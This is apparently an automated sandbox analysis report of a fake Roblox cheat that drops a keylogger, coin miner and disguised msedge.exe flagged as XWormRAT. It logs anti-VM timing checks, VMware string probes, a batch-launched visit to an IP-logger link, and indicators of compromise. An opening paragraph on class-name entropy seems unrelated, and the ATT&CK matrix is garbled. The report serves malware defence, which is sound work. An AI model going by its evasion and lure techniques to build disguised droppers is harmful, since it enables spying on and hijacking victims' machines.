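The ordinary names score around 4.3 bits per character because English fragments reuse a few lowercase letters, while the renamed class lands near 5.6 bits, close to the maximum for a mixed-case alphanumeric alphabet. Entropy alone will also flag the qPFRCBxx... row above even though it starts with Equals/GetHashCode/GetType/ToString, because the four long random names dominate the concatenation; the fix-up count is what separates renamed members from an unlucky but legitimate class.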
Source: C:\Users\user\Desktop\roblox cheat.exe | File created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | File created: C:\Users\user\AppData\Local\Temp\ msedge.exe
Source: C:\Users\user\Desktop\roblox cheat.exe | File created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | File created: C:\Users\user\AppData\Local\Temp\Keyloger.exe
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | File created: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\Desktop\roblox cheat.exe | Process information set: NOOPENFILEERRORBOX (19 identical entries)
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | RDTSC instruction interceptor: First address: B039F0 second address: B03A8B instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ecx+20h], eax 0x00000005 mov dword ptr [ecx+24h], edx 0x00000008 mov dword ptr [ecx+2Ch], 00000016h 0x0000000f mov dword ptr [ecx+30h], 00000000h 0x00000016 mov dword ptr [ecx+34h], 00000000h 0x0000001d mov dword ptr [ecx+38h], 00000000h 0x00000024 mov dword ptr [ecx+48h], 00000000h 0x0000002b mov dword ptr [ecx+4Ch], 00000000h 0x00000032 mov dword ptr [ecx+50h], 00000000h 0x00000039 mov dword ptr [ecx+54h], 00000000h 0x00000040 mov dword ptr [ecx+68h], 00000000h 0x00000047 mov dword ptr [ecx+60h], 00000000h 0x0000004e mov dword ptr [ecx+64h], 00000000h 0x00000055 mov dword ptr [ecx+6Ch], 00000001h 0x0000005c mov dword ptr [ecx+10h], 0000003Ch 0x00000063 mov dword ptr [ecx], 00000000h 0x00000069 mov dword ptr [ecx+00088978h], FFFFFFFFh 0x00000073 mov dword ptr [ecx+00088D80h], FFFFFFFFh 0x0000007d mov dword ptr [ecx+00089188h], FFFFFFFFh 0x00000087 mov dword ptr [ecx+00089590h], FFFFFFFFh 0x00000091 mov dword ptr [ecx+00089998h], FFFFFFFFh 0x0000009b rdtsc
Source: C:\Users\user\Desktop\roblox cheat.exe | Memory allocated: 1A30000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\roblox cheat.exe | Memory allocated: 32E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\roblox cheat.exe | Memory allocated: 31E0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\roblox cheat.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Window / User API: threadDelayed 9941
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ msedge.exe
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Keyloger.exe
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Evasive API call chain: GetSystemTimeAsFileTime, DecisionNodes (graph_2-1905)
Source: C:\Users\user\Desktop\roblox cheat.exe TID: 5980 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe TID: 7176 | Thread sleep time: -44236s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe TID: 7176 | Thread sleep time: -52370s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe TID: 7176 | Thread sleep time: -39675s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | File Volume queried: C:\Users\user\AppData\Local\Temp\Roblox\http FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF75456B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 3_2_00007FF75456B190
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF7545540BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 3_2_00007FF7545540BC
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF75457FCA0 FindFirstFileExA, | 3_2_00007FF75457FCA0
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF7545716A4 VirtualQuery,GetSystemInfo, | 3_2_00007FF7545716A4
Source: C:\Users\user\Desktop\roblox cheat.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Thread delayed: delay time: 44236
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Thread delayed: delay time: 52370
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Thread delayed: delay time: 39675
Source: roblox cheat.exe, robloxPX1instaler.exe.0.dr, cacert.pem.2.dr | Binary or memory string: MDALj2aTPs+9xYa9+bG3tD60B8jzljHz7aRP+KNOjSkVWLjVb3/ubCK1sK9IRQq9qEmUv4RDsNuE
Source: roblox cheat.exe, 00000000.00000002.1348520885.00000000015FC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_
Source: cheatinstaler cheatinstalerF6R54T.exe, 00000003.00000002.1365901576.00000228251F4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
Source: roblox cheat.exe, 00000000.00000002.1348520885.0000000001571000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yH+
Source: robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Code function: 2_2_00D1E378 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 2_2_00D1E378
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Code function: 2_2_00D3D0F8 mov eax, dword ptr fs:[00000030h] | 2_2_00D3D0F8
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Code function: 2_2_00D343AC mov ecx, dword ptr fs:[00000030h] | 2_2_00D343AC
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Code function: 2_2_00D3D13C mov eax, dword ptr fs:[00000030h] | 2_2_00D3D13C
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF754580D20 GetProcessHeap, | 3_2_00007FF754580D20
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Code function: 2_2_00D12F78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 2_2_00D12F78
Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | Code function: 2_2_00D1E378 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 2_2_00D1E378
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF7545776D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_00007FF7545776D8
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF754573170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, | 3_2_00007FF754573170
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF754573354 SetUnhandledExceptionFilter, | 3_2_00007FF754573354
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF754572510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 3_2_00007FF754572510
Source: C:\Users\user\Desktop\roblox cheat.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | Code function: 3_2_00007FF75456B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, | 3_2_00007FF75456B190
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe "C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe" Jump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeProcess created: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe "C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\coin.bat" "Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/24RXx6Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545858E0 cpuid 3_2_00007FF7545858E0
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_00007FF75456A2CC
            Source: C:\Users\user\Desktop\roblox cheat.exeQueries volume information: C:\Users\user\Desktop\roblox cheat.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\roblox cheat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeCode function: 2_2_00D13495 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00D13495
            Source: C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exeCode function: 3_2_00007FF7545551A4 GetVersionExW,3_2_00007FF7545551A4
            Source: C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

Source: Yara match; File source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 7156, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED

            Remote Access Functionality

Source: Yara match; File source: 00000003.00000003.1356335250.00000228251A3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: cheatinstaler cheatinstalerF6R54T.exe PID: 7156, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\ msedge.exe, type: DROPPED
Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, type: DROPPED
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid Accounts1
            Native API
            1
            Scripting
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            Input Capture
            1
            System Time Discovery
            Remote Services12
            Archive Collected Data
            3
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory2
            File and Directory Discovery
            Remote Desktop Protocol1
            Input Capture
            11
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Registry Run Keys / Startup Folder
            11
            Process Injection
            1
            Obfuscated Files or Information
            Security Account Manager136
            System Information Discovery
            SMB/Windows Admin SharesData from Network Shared Drive4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Registry Run Keys / Startup Folder
            21
            Software Packing
            NTDS221
            Security Software Discovery
            Distributed Component Object ModelInput Capture5
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp
            LSA Secrets1
            Process Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials31
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Masquerading
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
            Virtualization/Sandbox Evasion
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
            Process Injection
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
[Behavior graph (ID 1484380, sample roblox cheat.exe, start date 30/07/2024, architecture WINDOWS, score 90): roblox cheat.exe drops robloxPX1instaler.exe, cheatinstaler cheatinstalerF6R54T.exe and roblox cheat.exe.log and starts the two executables; cheatinstaler cheatinstalerF6R54T.exe drops Keyloger.exe, BitCoin_miner.exe and msedge.exe and starts cmd.exe, which in turn starts chrome.exe, a second cmd.exe and conhost.exe; robloxPX1instaler.exe contacts roblox.com and cloudfront.net hosts and is flagged for trying to detect virtualization through RDTSC time measurements.]

Source | Detection | Scanner | Label
roblox cheat.exe | 61% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
roblox cheat.exe | 100% | Avira | TR/Dropper.Gen
roblox cheat.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\ msedge.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\Keyloger.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\ msedge.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\Keyloger.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\ msedge.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | 76% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
C:\Users\user\AppData\Local\Temp\Keyloger.exe | 82% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
C:\Users\user\AppData\Local\Temp\cheatinstaler cheatinstalerF6R54T.exe | 61% | ReversingLabs | ByteCode-MSIL.Backdoor.XWormRAT
C:\Users\user\AppData\Local\Temp\robloxPX1instaler.exe | 0% | ReversingLabs |
            No Antivirus matches
            No Antivirus matches
                                • Avira URL Cloud: safe
                                unknown
                                https://curl.se/docs/alt-svc.htmlroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://cdn.iplogger.org/redirect/brand.pngchromecache_137.12.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://ecsv2.roblox.com/client/pbeesrobloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certroblox cheat.exe, robloxPX1instaler.exe.0.dr, cacert.pem.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.quovadisglobal.com/cpsrobloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer(robloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper.robloxPX1instaler_48CB5.log.2.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperLMEMXrobloxPX1instaler.exe, 00000002.00000003.2349153640.0000000004151000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.securetrust.com/STCA.crlrobloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerprobloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.roblox.com/_1JrobloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001C69000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.accv.es/legislacion_c.htmrobloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayeronsrobloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.xrampsecurity.com/XGCA.crl0robloxPX1instaler.exe, 00000002.00000003.1360804950.0000000001D26000.00000004.00000020.00020000.00000000.sdmp, robloxPX1instaler.exe, 00000002.00000002.3210759672.0000000001D25000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsStudio64robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerocalrobloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://iplogger.org/rules/chromecache_137.12.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://bit.ly/1eMQ42Uroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://crl.certigna.fr/certignarootca.crl01robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.cert.fnmt.es/dpcs/robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.winimage.com/zLibDllroblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • URL Reputation: safe
                                unknown
                                https://s3.amazonaws.com/robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.accv.es00robloxPX1instaler.exe, 00000002.00000002.3211954464.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://2no.co/chromecache_137.12.drfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://clientsettingscdn.roblox.com/v2/settingsrobloxPX1instaler.exe, 00000002.00000002.3211954464.0000000004148000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://ecsv2.roblox.com/client/pberoblox cheat.exe, robloxPX1instaler.exe.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://2no.co/redirect-2chromecache_137.12.drfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperaterobloxPX1instaler.exe, 00000002.00000003.2349153640.0000000004151000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
88.212.201.198 | counter.yadro.ru | Russian Federation | 39134 | UNITEDNETRU | false
18.239.18.85 | d2v57ias1m20gl.cloudfront.net | United States | 16509 | AMAZON-02US | false
128.116.21.3 | edge-term4-ams2.roblox.com | United States | 22697 | ROBLOX-PRODUCTIONUS | false
104.21.79.229 | 2no.co | United States | 13335 | CLOUDFLARENETUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
142.250.186.132 | www.google.com | United States | 15169 | GOOGLEUS | false
35.190.80.1 | a.nel.cloudflare.com | United States | 15169 | GOOGLEUS | false
104.21.4.208 | cdn.iplogger.org | United States | 13335 | CLOUDFLARENETUS | false
                                IP
                                192.168.2.7
                                192.168.2.9
                                192.168.2.6
                                192.168.2.10
                                127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1484380
Start date and time: 2024-07-30 00:53:33 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: roblox cheat.exe
Detection: MAL
Classification: mal90.troj.spyw.evad.winEXE@32/23@18/13
EGA Information:
• Successful, ratio: 66.7%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 142.250.185.174, 142.250.185.163, 142.251.168.84, 34.104.35.123, 192.229.221.95, 142.250.186.35, 23.51.111.252, 142.250.185.206
